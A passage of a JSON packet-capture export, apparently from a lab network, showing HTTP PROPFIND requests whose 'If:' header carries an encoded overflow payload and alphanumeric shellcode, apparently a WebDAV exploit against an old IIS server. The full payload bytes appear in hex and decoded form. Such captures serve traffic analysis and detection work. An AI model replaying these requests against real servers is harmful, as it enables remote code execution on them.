"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:62:74:58:56:43:49:77:58:75:67:74:72:45:6a:73:4e:78:70:6a:59:4d:6c:44:55:61:56:55:5a:66:76:61:71:46:50:4f:42:78:6a:6d:63:58:66:69:51:66:4c:51:64:6a:55:77:57:4d:52:55:55:55:69:6b:4f:79:46:51:52:49:4b:6c:6b:53:74:51:48:62:57:58:61:43:68:72:46:48:48:68:e4:b9:86:e6:a5:90:e6:85:95:e5:91:ab:e7:99:a4:e7:81:8b:e4:a9:a1:e5:8d:88:e4:a1:a8:e5:89:99:e7:9d:b3:e4:8d:82:e7:a9:ba:e5:89:92:e4:a1:b9:e6:95:88:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:ad:a8:e4:99:a1:e6:a1:b7:e5:89:98:e7:a1:9a:e6:bd:84:e4:91:a8:e6:85:96:e5:9d:91:e4:8d:98:e7:8d:ae:e4:95:86:e5:a9:99:e7:a5:8f:e5:8d:ab:e4:ad:8c:e4:a9:ae:e6:85:a5:e5:a1:98:e6:99:8c:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6c:45:65:68:4a:6a:4d:78:76:68:45:4d:70:65:44:69:49:59:55:6a:42:49:64:48:59:67:54:58:59:78:4b:51:54:52:4e:4f:6f:6f:57:59:42:71:65:4f:47:6d:68:4a:72:59:56:7a:48:52:4a:42:59:55:49:51:4d:72:74:73:47:43:72:4d:70:7a:66:63:68:76:66:49:46:45:4e:76:66:46:46:e4:b5:a3:e7:a5:ba:e6:b5:93:e7:9d:aa:e5:a5:85:e4:b5:95:e4:a9:95:e4:85:b0:e7:8d:93:e4:8d:86:e4:95:b7:e5:9d:89:e7:a5:9a:e4:b1:83:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:bd:a8:e6:b1:ae:e4:8d:a6:e4:a1:b4:e1:8f:80:e6:a0:83:e6:91:84:e6:bd:86:e7:8d:82:e4:95:a5:e6:b5:b4:e4:b9:b7:e6:b9:b6:e7:a9:a8:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/btXVCIwXugtrEjsNxpjYMlDUaVUZfvaqFPOBxjmcXfiQfLQdjUwWMRUUUikOyFQRIKlkStQHbWXaChrFHHh<48><68><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/lEehJjMxvhEMpeDiIYUjBIdHYgTXYxKQTRNOooWYBqeOGmhJrYVzHRJBYUIQMrtsGCrMpzfchvfIFENvfFF<46><46><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "409"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.839967000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.839967000",
|
||
"frame.time_delta": "0.000008000",
|
||
"frame.time_delta_displayed": "0.013943000",
|
||
"frame.time_relative": "17.090907000",
|
||
"frame.number": "420",
|
||
"frame.len": "293",
|
||
"frame.cap_len": "293",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "279",
|
||
"ip.id": "0x0000247a",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00000c00",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "35541",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "35541",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "64",
|
||
"tcp.len": "227",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "4270540563",
|
||
"tcp.nxtseq": "1676",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3755938489",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000b25c",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:67:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:67:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868647",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000606000",
|
||
"tcp.analysis.bytes_in_flight": "1675",
|
||
"tcp.analysis.push_bytes_sent": "1675"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000967000",
|
||
"tcp.time_delta": "0.000008000"
|
||
},
|
||
"tcp.payload": "78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "419",
|
||
"tcp.segment": "420",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1675",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:63:62:7a:45:76:69:6a:69:5a:45:50:5a:67:56:79:41:4f:46:78:76:75:73:58:7a:62:52:56:7a:45:53:77:61:43:79:6a:76:57:58:4a:68:4e:41:51:4a:6e:64:79:77:53:54:71:58:55:57:68:71:61:69:62:52:75:4b:72:4a:4c:68:48:67:4b:4b:64:77:76:55:65:47:46:73:76:73:48:63:e5:a5:8a:e5:91:a2:e5:89:b5:e5:a1:b7:e4:a9:81:e7:99:8a:e6:8d:8c:e6:95:a5:e6:a5:93:e6:91:b8:e7:99:8d:e7:9d:8b:e7:81:a4:e6:8d:ba:e7:8d:b0:e6:89:95:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:b1:97:e5:95:a4:e5:a5:81:e4:85:a4:e7:8d:8c:e5:95:8c:e4:89:b3:e4:ad:82:e6:85:a2:e5:99:90:e4:b9:8a:e6:99:ac:e4:a9:92:e4:a1:a1:e4:95:a4:e4:91:ac:e4:a1:86:e6:b9:b4:e4:89:ae:e4:89:89:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6b:4b:69:72:78:43:61:59:47:63:56:48:42:56:7a:59:4b:71:69:5a:57:50:44:70:44:70:63:54:52:75:7a:56:6f:72:75:6a:48:56:72:48:68:48:52:6b:73:69:6c:4f:61:79:79:6c:73:75:58:47:71:50:4b:77:4a:45:4f:75:66:4c:5a:55:75:67:4f:46:41:75:4d:51:67:4b:49:48:43:66:e7:95:b5:e6:a5:9a:e5:95:8d:e5:99:93:e7:a5:a4:e6:ad:b5:e6:b5:86:e4:b1:b3:e4:8d:8b:e4:b1:ae:e7:91:83:e6:b1:92:e4:95:ad:e7:a1:a4:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:99:ae:e4:ad:92:e5:89:a1:e4:8d:93:e1:8f:80:e6:a0:83:e7:95:91:e5:99:af:e4:9d:af:e7:a1:94:e5:81:8c:e7:a1:b6:e4:8d:a9:e6:b9:b7:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6